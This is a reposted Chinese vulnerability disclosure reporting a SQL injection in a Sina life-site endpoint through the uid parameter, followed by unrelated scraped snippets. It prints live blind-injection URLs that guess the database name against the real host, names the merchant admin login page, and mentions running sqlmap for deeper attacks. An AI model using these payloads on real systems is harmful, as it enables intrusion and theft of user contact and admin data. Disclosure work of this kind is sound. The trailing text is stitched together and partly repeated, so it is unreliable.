核心产品
帮助中心
时间:2021-05-23
注入漏洞存在地址为
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310
其中该漏洞可以导致数据泄漏,其中泄漏的数据包括团购,优惠券、以及用户联系方式,smslog,团购商户、admin等数据。
同时,团购的商户登陆地址为
http://life.sina.com.cn/tuanadmin
漏洞证明:下面为手工猜解数据库名的语句为
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and Length((database()))<5
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=108
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=105
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=102
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=101
下图为注入是返回对正确与错误的截图
注入返回对的情况截图
注入时返回错的情况截图
一下是使用sqlmap对注入点进行注入攻击,一下该例为查询数据库banner,通过改变命令参数可以对其进行更深入的攻击。
修复方案:
对其uid参数进行检查并且进行过滤。
作者 Insight-labs
声明:本页内容来源网络,仅供用户参考;我单位不保证亦不表示资料全面及准确无误,也不保证亦不表示这些资料为最新信息,如因任何原因,本网内容或者用户因倚赖本网内容造成任何损失或损害,我单位将不会负任何法律责任。如涉及版权问题,请提交至online#300.cn邮箱联系删除。
DVWA是用PHP+MySQL编写的一套用于常规Web漏洞教学和检测的Web脆弱性测试程序,包含了SQL注入、XSS、盲注等常见的一些安全漏洞,是一个非常好的网
社区商业,提供了社区居民需要的日常生活服务,这些服务具有经常性、便利性,同时社区商业也是以社区居民为服务对象,以便民利民为宗旨,以提高生活质量、满足居民综合消费
桌面图标异常是怎么回事异常图标修复方法桌面图标异常是怎么回事异常图标修复方法桌面图标异常是怎么回事异常图标修复方法桌面图标异常是怎么回事异常图标修复方法桌面图标
桌面图标异常是怎么回事异常图标修复方法桌面图标异常是怎么回事异常图标修复方法桌面图标异常是怎么回事异常图标修复方法桌面图标异常是怎么回事异常图标修复方法桌面图标
以电脑版360安全卫士为例,360安全卫士关闭漏洞修复方法是: 1、打开360安全卫士,选择系统修复; 2、选择360安全卫士软件界面右上角的三角按钮,选择
